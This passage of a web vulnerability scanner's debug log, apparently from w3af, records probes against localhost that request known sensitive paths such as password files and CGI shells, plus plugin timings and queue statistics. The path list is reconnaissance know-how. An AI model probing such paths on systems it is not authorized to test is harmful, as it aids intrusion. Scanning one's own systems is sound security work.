10:04:33 2020 - debug] feeds.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] error_pages.grep(uri="http://localhost:9090/news/") took 0.10s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/logit.cgi returned HTTP code "404" (id=24066,from_cache=0,grep=1,rtt=0.13,did=iv7Ezxpd) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/wwwthreads/w3tvars.pm returned HTTP code "404" (id=24062,from_cache=0,grep=1,rtt=0.11,did=BSepSXKZ) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/htdocs/ returned HTTP code "404" (id=24069,from_cache=0,grep=1,rtt=0.04,did=VAXf48MY) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/wwwboard/passwd.txt returned HTTP code "404" (id=24070,from_cache=0,grep=1,rtt=0.09,did=LqtSYqou) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/stats_old/ returned HTTP code "404" (id=24058,from_cache=0,grep=1,rtt=0.07,did=zSdY2mwc) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/msword/ returned HTTP code "404" (id=24064,from_cache=0,grep=1,rtt=0.06,did=wes7XVe9) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/officescan/cgi/jdkRqNotify.exe returned HTTP code "404" (id=24072,from_cache=0,grep=1,rtt=0.09,did=wtf8JSQ4) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/site/iissamples/ returned HTTP code "404" (id=24052,from_cache=0,grep=1,rtt=0.06,did=BEWEXJDk) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/meta.pl returned HTTP code "404" (id=24054,from_cache=0,grep=1,rtt=0.18,did=hSuh51A0) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2309. [Wed Feb 12 10:04:33 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/news/") took 0.14s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/wwwstats/ returned HTTP code "404" (id=24063,from_cache=0,grep=1,rtt=0.09,did=LV6Pa5xE) [Wed Feb 12 10:04:33 2020 - debug] localhost:9090 connection pool stats (free:224 / in_use:11 / max:50 / total:235) [Wed Feb 12 10:04:33 2020 - debug] Connections with more in use time: (ea61cd0333a36578, 0.25 sec) (f74eb378689f0651, 0.19 sec) (1e69b270c8c3026c, 0.13 sec) (0643e4b53c4078c6, 0.12 sec) (fd51e623549b5c87, 0.12 sec) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/admin/auth.php returned HTTP code "404" (id=24073,from_cache=0,grep=1,rtt=0.08,did=5xGzZtWR) [Wed Feb 12 10:04:33 2020 - debug] symfony.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2310. [Wed Feb 12 10:04:33 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2311. [Wed Feb 12 10:04:33 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/password returned HTTP code "404" (id=24078,from_cache=0,grep=1,rtt=0.14,did=pIMpXdOl) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/web800fo/ returned HTTP code "404" (id=24079,from_cache=0,grep=1,rtt=0.08,did=FMSCt4Vg) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/graphics/ returned HTTP code "404" (id=24081,from_cache=0,grep=1,rtt=0.06,did=hoRdjz2n) [Wed Feb 12 10:04:33 2020 - debug] file_upload.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/logs.txt returned HTTP code "404" (id=24075,from_cache=0,grep=1,rtt=0.16,did=6qoRngdS) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/stylesheets/ returned HTTP code "404" (id=24076,from_cache=0,grep=1,rtt=0.20,did=Aolo9fYm) [Wed Feb 12 10:04:33 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12489, 'reject-seen-url': 5797, 'reject-out-of-scope': 216, 'accept': 4948} [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/admin.pl returned HTTP code "404" (id=24080,from_cache=0,grep=1,rtt=0.09,did=Nxyh1TwD) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/servicio/ returned HTTP code "404" (id=24077,from_cache=0,grep=1,rtt=0.07,did=viCBg4er) [Wed Feb 12 10:04:33 2020 - debug] expect_ct.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] svn_users.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] private_ip.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] motw.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_generator.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] retirejs.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:33 2020 - debug] serialized_object.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] blank_body.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] credit_cards.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] websockets_links.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] csp.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] vulners_db.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] dom_xss.grep(uri="http://localhost:9090/eng/") took 0.03s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/message/ returned HTTP code "404" (id=24074,from_cache=0,grep=1,rtt=0.07,did=2Zxvsw7R) [Wed Feb 12 10:04:33 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] keys.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] clamav.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2312. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4530. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2313. [Wed Feb 12 10:04:33 2020 - debug] url_session.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] objects.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] error_500.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_tags.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/sam.bin returned HTTP code "404" (id=24083,from_cache=0,grep=1,rtt=0.07,did=OuMsOWz4) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/user/ returned HTTP code "404" (id=24084,from_cache=0,grep=1,rtt=0.20,did=GFOJuDE6) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2314. [Wed Feb 12 10:04:33 2020 - debug] password_profiling.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] click_jacking.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] lang.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/archive_forum.asp returned HTTP code "404" (id=24082,from_cache=0,grep=1,rtt=0.07,did=kH0FsArF) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2315. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/stats.htm returned HTTP code "404" (id=24085,from_cache=0,grep=1,rtt=0.31,did=NHXHFpX2) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/orders/orders.txt returned HTTP code "404" (id=24086,from_cache=0,grep=1,rtt=0.10,did=noO4nakq) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/logfile.html returned HTTP code "404" (id=24087,from_cache=0,grep=1,rtt=0.18,did=Apw2BNTz) [Wed Feb 12 10:04:33 2020 - debug] strange_reason.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cache_control.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_headers.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] ssn.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] oracle.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] feeds.grep(uri="http://localhost:9090/eng/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] error_pages.grep(uri="http://localhost:9090/eng/") took 0.06s to run [Wed Feb 12 10:04:33 2020 - debug] localhost:9090 connection pool stats (free:236 / in_use:4 / max:50 / total:240) [Wed Feb 12 10:04:33 2020 - debug] Connections with more in use time: (93f1c22abbc96b63, 0.17 sec) (d9e2297758ba9246, 0.10 sec) (7f5ce9e5d06cbf31, 0.02 sec) (5b765dd8773d7927, 0.01 sec) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/manager/ returned HTTP code "404" (id=24090,from_cache=0,grep=1,rtt=0.15,did=NAUZPdrI) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/wstats/ returned HTTP code "404" (id=24094,from_cache=0,grep=1,rtt=0.06,did=etq5qAXc) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/install/ returned HTTP code "404" (id=24096,from_cache=0,grep=1,rtt=0.08,did=ZIYDEth8) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/statview.pl returned HTTP code "404" (id=24097,from_cache=0,grep=1,rtt=0.05,did=l0VITTIA) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/community/index.php?analized=anything returned HTTP code "404" (id=24098,from_cache=0,grep=1,rtt=0.05,did=SAdY55hV) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/csh returned HTTP code "404" (id=24099,from_cache=0,grep=1,rtt=0.06,did=OHAbCzXX) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2316. [Wed Feb 12 10:04:33 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/eng/") took 0.16s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/webmaster_logs/ returned HTTP code "404" (id=24089,from_cache=0,grep=1,rtt=0.09,did=AaUjZt5a) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/tar/ returned HTTP code "404" (id=24091,from_cache=0,grep=1,rtt=0.17,did=hI2gsdJI) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/edit.pl returned HTTP code "404" (id=24092,from_cache=0,grep=1,rtt=0.06,did=LWEVDeU2) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/src/ returned HTTP code "404" (id=24101,from_cache=0,grep=1,rtt=0.09,did=frFedhNu) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/prueba/ returned HTTP code "404" (id=24102,from_cache=0,grep=1,rtt=0.06,did=QfLMZxIF) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/retail/ returned HTTP code "404" (id=24093,from_cache=0,grep=1,rtt=0.06,did=zJALHWxy) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/minimal.exe returned HTTP code "404" (id=24103,from_cache=0,grep=1,rtt=0.15,did=zd7fPdJy) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/hostingcontroller/ returned HTTP code "404" (id=24095,from_cache=0,grep=1,rtt=0.13,did=j2s5NdlZ) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/admin/objects.inc.php4 returned HTTP code "404" (id=24088,from_cache=0,grep=1,rtt=0.24,did=jnHSiMyy) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/logs.pl returned HTTP code "404" (id=24105,from_cache=0,grep=1,rtt=0.09,did=CXeLLQ7a) [Wed Feb 12 10:04:33 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12508, 'reject-seen-url': 5803, 'reject-out-of-scope': 216, 'accept': 4948} [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/glimpse returned HTTP code "404" (id=24106,from_cache=0,grep=1,rtt=0.14,did=0UFvCCE0) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2317. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/tpgnrock returned HTTP code "404" (id=24107,from_cache=0,grep=1,rtt=0.21,did=nnQbxx64) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/guest/ returned HTTP code "404" (id=24108,from_cache=0,grep=1,rtt=0.08,did=lSCPOCec) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/tests/ returned HTTP code "404" (id=24104,from_cache=0,grep=1,rtt=0.20,did=VvKVc5Zv) [Wed Feb 12 10:04:33 2020 - debug] symfony.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] file_upload.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/search.vts returned HTTP code "404" (id=24111,from_cache=0,grep=1,rtt=0.13,did=47F5l4G0) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/old/ returned HTTP code "404" (id=24112,from_cache=0,grep=1,rtt=0.14,did=gi6xBU0B) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/python/ returned HTTP code "404" (id=24114,from_cache=0,grep=1,rtt=0.24,did=w591qlWM) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/webutil.pl returned HTTP code "404" (id=24115,from_cache=0,grep=1,rtt=0.12,did=9Ez61Zv1) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/adminhot.cgi returned HTTP code "404" (id=24116,from_cache=0,grep=1,rtt=0.23,did=mY5BUTnZ) [Wed Feb 12 10:04:33 2020 - debug] expect_ct.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] svn_users.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] private_ip.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] motw.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_generator.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2318. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/passwords.txt returned HTTP code "404" (id=24109,from_cache=0,grep=1,rtt=0.20,did=4q1LpQoD) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/vc30/ returned HTTP code "404" (id=24118,from_cache=0,grep=1,rtt=0.15,did=3vwiIrum) [Wed Feb 12 10:04:33 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:33 2020 - debug] serialized_object.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] blank_body.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] credit_cards.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] websockets_links.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] csp.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] dom_xss.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/piranha/secure/passwd.php3 returned HTTP code "404" (id=24119,from_cache=0,grep=1,rtt=0.24,did=a4LgmnLu) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/js returned HTTP code "404" (id=24113,from_cache=0,grep=1,rtt=0.19,did=slVAcJ83) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/post_query returned HTTP code "404" (id=24117,from_cache=0,grep=1,rtt=0.06,did=MT4AdVZk) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/bash returned HTTP code "404" (id=24110,from_cache=0,grep=1,rtt=0.15,did=LoVlcdbw) [Wed Feb 12 10:04:33 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] keys.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] retirejs.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] clamav.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2319. [Wed Feb 12 10:04:33 2020 - debug] localhost:9090 connection pool stats (free:240 / in_use:5 / max:50 / total:245) [Wed Feb 12 10:04:33 2020 - debug] Connections with more in use time: (f676516386c110f9, 0.21 sec) (ca50adfad6b18227, 0.15 sec) (26c000ac8a91331a, 0.14 sec) (ebecdb5b5c76ccff, 0.07 sec) (bfb3e06f6a2cfe1b, 0.01 sec) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/Msword/ returned HTTP code "404" (id=24120,from_cache=0,grep=1,rtt=0.27,did=rlJl7UNx) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/zsh returned HTTP code "404" (id=24123,from_cache=0,grep=1,rtt=0.26,did=04XyJy9u) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/webaccess.htm returned HTTP code "404" (id=24124,from_cache=0,grep=1,rtt=0.16,did=YLjQwrw4) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/users/ returned HTTP code "404" (id=24121,from_cache=0,grep=1,rtt=0.14,did=fd7pgrVK) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2320. [Wed Feb 12 10:04:33 2020 - debug] vulners_db.grep(uri="http://localhost:9090/view/") took 0.25s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/admin/cfg/configscreen.inc.php returned HTTP code "404" (id=24125,from_cache=0,grep=1,rtt=0.17,did=jdaLHAt4) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cutenews/shownews.php returned HTTP code "404" (id=24122,from_cache=0,grep=1,rtt=0.16,did=CMd0emba) [Wed Feb 12 10:04:33 2020 - debug] Still have 1 unfinished tasks in CrawlInfraIn join() [Wed Feb 12 10:04:33 2020 - debug] url_session.grep(uri="http://localhost:9090/view/") took 0.05s to run [Wed Feb 12 10:04:33 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] objects.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] error_500.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_tags.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] password_profiling.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] click_jacking.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] lang.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2321. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/board/index.php returned HTTP code "404" (id=24126,from_cache=0,grep=1,rtt=0.22,did=q34qkl9d) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/sam._ returned HTTP code "404" (id=24128,from_cache=0,grep=1,rtt=0.04,did=n1L3zuEq) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/stats.html returned HTTP code "404" (id=24129,from_cache=0,grep=1,rtt=0.03,did=AjgAAir8) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/community/member.php returned HTTP code "404" (id=24130,from_cache=0,grep=1,rtt=0.06,did=UyxXcHqf) [Wed Feb 12 10:04:33 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12527, 'reject-seen-url': 5808, 'reject-out-of-scope': 216, 'accept': 4949} [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/logs/ returned HTTP code "404" (id=24132,from_cache=0,grep=1,rtt=0.22,did=vKJz1W47) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4529. [Wed Feb 12 10:04:33 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/messaging/ returned HTTP code "404" (id=24131,from_cache=0,grep=1,rtt=0.03,did=JzgoVYfL) [Wed Feb 12 10:04:33 2020 - debug] error_pages.grep(uri="http://localhost:9090/view/") took 0.03s to run [Wed Feb 12 10:04:33 2020 - debug] strange_reason.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cache_control.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_headers.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] ssn.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] oracle.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] feeds.grep(uri="http://localhost:9090/view/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2322. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/outgoing/ returned HTTP code "404" (id=24127,from_cache=0,grep=1,rtt=0.32,did=WQx9ectX) [Wed Feb 12 10:04:33 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/view/") took 0.02s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/subir/ returned HTTP code "404" (id=24134,from_cache=0,grep=1,rtt=0.10,did=Gn7bXQqY) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/manual/ returned HTTP code "404" (id=24136,from_cache=0,grep=1,rtt=0.10,did=pdv1gFvn) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/tarjetas/ returned HTTP code "404" (id=24133,from_cache=0,grep=1,rtt=0.18,did=HHBAR3HX) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2323. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4529. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2324. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/wwwthreads/3tvars.pm returned HTTP code "404" (id=24135,from_cache=0,grep=1,rtt=0.12,did=3c8l7lPh) [Wed Feb 12 10:04:33 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] symfony.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] expect_ct.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] svn_users.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] private_ip.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] motw.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 